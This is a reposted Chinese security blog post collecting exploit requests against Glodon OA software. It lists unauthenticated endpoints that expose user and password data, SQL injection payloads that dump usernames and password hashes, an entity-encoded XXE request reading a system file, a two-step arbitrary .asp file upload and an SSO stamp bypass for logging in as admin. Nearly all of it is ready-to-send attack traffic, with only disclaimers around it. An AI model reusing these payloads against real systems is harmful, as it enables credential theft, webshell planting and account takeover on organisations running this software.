广联达 - 漏洞笔记

admin
admin
admin
144121
文章
118
评论
2025年5月26日17:08:51评论21 views字数 8412阅读28分2秒阅读模式
免责声明
本文仅用于学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用!!!
广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。
广联达 - 漏洞笔记
漏洞问题
隐患URL
http://URL/Org/service/Service.asmx
广联达 - 漏洞笔记
查看所有工程
http://URL/Org/service/Service.asmx/GetDeptXml4GEPS
广联达 - 漏洞笔记
查看用户和密码
http://url/Org/service/Service.asmx/GetUserXml4GEPS
广联达 - 漏洞笔记
GetIMDictionary  SQL注入
http://url/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
广联达 - 漏洞笔记
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1HostXX.XX.XXUpgrade-Insecure-Requests1User-AgentMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accepttext/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Refererhttp://xxx.com:8888/Services/Identification/Server/Incompatible.aspxAccept-Encodinggzip, deflateAccept-Languagezh-CN,zh;q=0.9CookieConnectioncloseContent-Typeapplication/x-www-form-urlencodedContent-Length88dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
EmailAccountOrgUserService SQL注入
POST /Mail/Services/EmailAccountOrgUserService.asmx HTTP/1.1HostXX.XXX.XXUser-AgentMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Content-Typetext/xmlContent-Length554<?xml version="1.0" encoding="utf-8"?><soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUserInfosByEmailxmlns="http://tempuri.org/"><email>') AND 3515 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3515=3515) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113))) AND ('ShLa'='ShLa</email></GetUserInfosByEmail></soap:Body></soap:Envelope>
gwgdwebservice SQL注入
POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1HostXX.XX.XXUser-AgentMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Content-Typeapplication/x-www-form-urlencodedAccept-Encodinggzip, deflateConnectioncloseContent-Length41employeeCode=1'-1/user--'&EncryptData=1
ArchiveWebService XML实体注入漏洞
POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1HostXX.XX.XXContent-Typetext/xml; charset=utf-8Content-LengthlengthSOAPAction"http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo"<?xml version="1.0" encoding="utf-8"?><soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  <soap:Body>    <PostArchiveInfoxmlns="http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx">      <archiveInfo>&#x3c;&#x21;&#x44;&#x4f;&#x43;&#x54;&#x59;&#x50;&#x45;&#x20;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x20;&#x5b;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x21;&#x45;&#x4e;&#x54;&#x49;&#x54;&#x59;&#x20;&#x73;&#x65;&#x63;&#x72;&#x65;&#x74;&#x20;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4d;&#x20;&#x22;&#x66;&#x69;&#x6c;&#x65;&#x3a;&#x2f;&#x2f;&#x2f;&#x77;&#x69;&#x6e;&#x64;&#x6f;&#x77;&#x73;&#x2f;&#x77;&#x69;&#x6e;&#x2e;&#x69;&#x6e;&#x69;&#x22;&#x3e;&#x0a;&#x5d;&#x3e;&#x0a;&#x0a;&#x3c;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x49;&#x6e;&#x66;&#x6f;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x55;&#x70;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x49;&#x44;&#x3e;&#x0a;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x0a;&#x0a;&#x0a;&#x26;&#x73;&#x65;&#x63;&#x72;&#x65;&#x74;&#x3b;&#x0a;&#x0a;&#x0a;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x0a;&#x3c;&#x2f;&#x55;&#x70;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x49;&#x44;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x49;&#x6e;&#x66;&#x6f;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x52;&#x65;&#x73;&#x75;&#x6c;&#x74;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x4d;&#x61;&#x69;&#x6e;&#x44;&#x6f;&#x63;&#x3e;&#x44;&#x6f;&#x63;&#x75;&#x6d;&#x65;&#x6e;&#x74;&#x20;&#x43;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x3c;&#x2f;&#x4d;&#x61;&#x69;&#x6e;&#x44;&#x6f;&#x63;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x52;&#x65;&#x73;&#x75;&#x6c;&#x74;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x44;&#x6f;&#x63;&#x49;&#x6e;&#x66;&#x6f;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x44;&#x6f;&#x63;&#x54;&#x79;&#x70;&#x65;&#x49;&#x44;&#x3e;&#x31;&#x3c;&#x2f;&#x44;&#x6f;&#x63;&#x54;&#x79;&#x70;&#x65;&#x49;&#x44;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x44;&#x6f;&#x63;&#x56;&#x65;&#x72;&#x73;&#x69;&#x6f;&#x6e;&#x3e;&#x31;&#x2e;&#x30;&#x3c;&#x2f;&#x44;&#x6f;&#x63;&#x56;&#x65;&#x72;&#x73;&#x69;&#x6f;&#x6e;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x44;&#x6f;&#x63;&#x49;&#x6e;&#x66;&#x6f;&#x3e;&#x20;&#x20;&#x0a;&#x3c;&#x2f;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x3e;</archiveInfo>      <folderIdList>string</folderIdList>      <platId>string</platId>    </PostArchiveInfo>  </soap:Body></soap:Envelope>
前台任意文件上传
获得key
POST /Services/FileService/UserFiles/GetAuthorizeKey.ashx HTTP/1.1Host: XX.XX.XXUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 49cmd=&destDir=./sysinfo/&destFilename=qrxyrgwa.asp
上传
POST /Services/FileService/UserFiles/UserFilesUpload.ashx HTTP/1.1HostXX.XX.XXUpgrade-Insecure-Requests1User-AgentMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0Accepttext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encodinggzip, deflateAccept-Languagezh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6ConnectioncloseContent-Typemultipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5Content-Length555------WebKitFormBoundarytCOFhbEjc3IfYaY5Content-Disposition: form-data; name="key"f3c7e655-9ecf-4e81-a7c1-da2e1172ff7b------WebKitFormBoundarytCOFhbEjc3IfYaY5Content-Disposition: form-data; name="destDir"./sysinfo/------WebKitFormBoundarytCOFhbEjc3IfYaY5Content-Disposition: form-data; name="destFilename"aaa.asp------WebKitFormBoundarytCOFhbEjc3IfYaY5Content-Disposition: form-data; name="file";filename="aaa.asp"content-type:image/png<% response.write("aaa")%>------WebKitFormBoundarytCOFhbEjc3IfYaY5--
GetSSOStamp 任意用户登录
POST /WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx HTTP/1.1HostxContent-Typetext/xml; charset=utf-8Content-Length355SOAPAction"http://tempuri.org/GetStamp"<?xml version="1.0" encoding="utf-8"?><soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body>   <GetStampxmlns="http://tempuri.org/">     <usercode>admin</usercode>   </GetStamp> </soap:Body></soap:Envelope>
登录接口
/Services/Identification/Server/login.ashx?sso=1&ssoProvider=WorkflowSSO&LoginFlag=custom&UserCode=admin&LoginCredence=856F1154F61FE89FDE236B64F565502C&LoginTimestamp=758027442&service=http://xxxxxx/Portal/Frame/layoutA/Default.aspx
ConfigService.asmx SQL注入
POST /Webservice/IM/Config/ConfigService.asmx HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/123.0.6312.88 Safari/537.36Content-Type: text/xml;charset=UTF-8<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetIMDictionary xmlns="http://tempuri.org/"><key>1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) fromT_ORG_USER --</key></GetIMDictionary></soap:Body></soap:Envelope>

原文始发于微信公众号(破晓信安):广联达(笔记)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月26日17:08:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   广联达 - 漏洞笔记https://cn-sec.com/archives/4099643.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息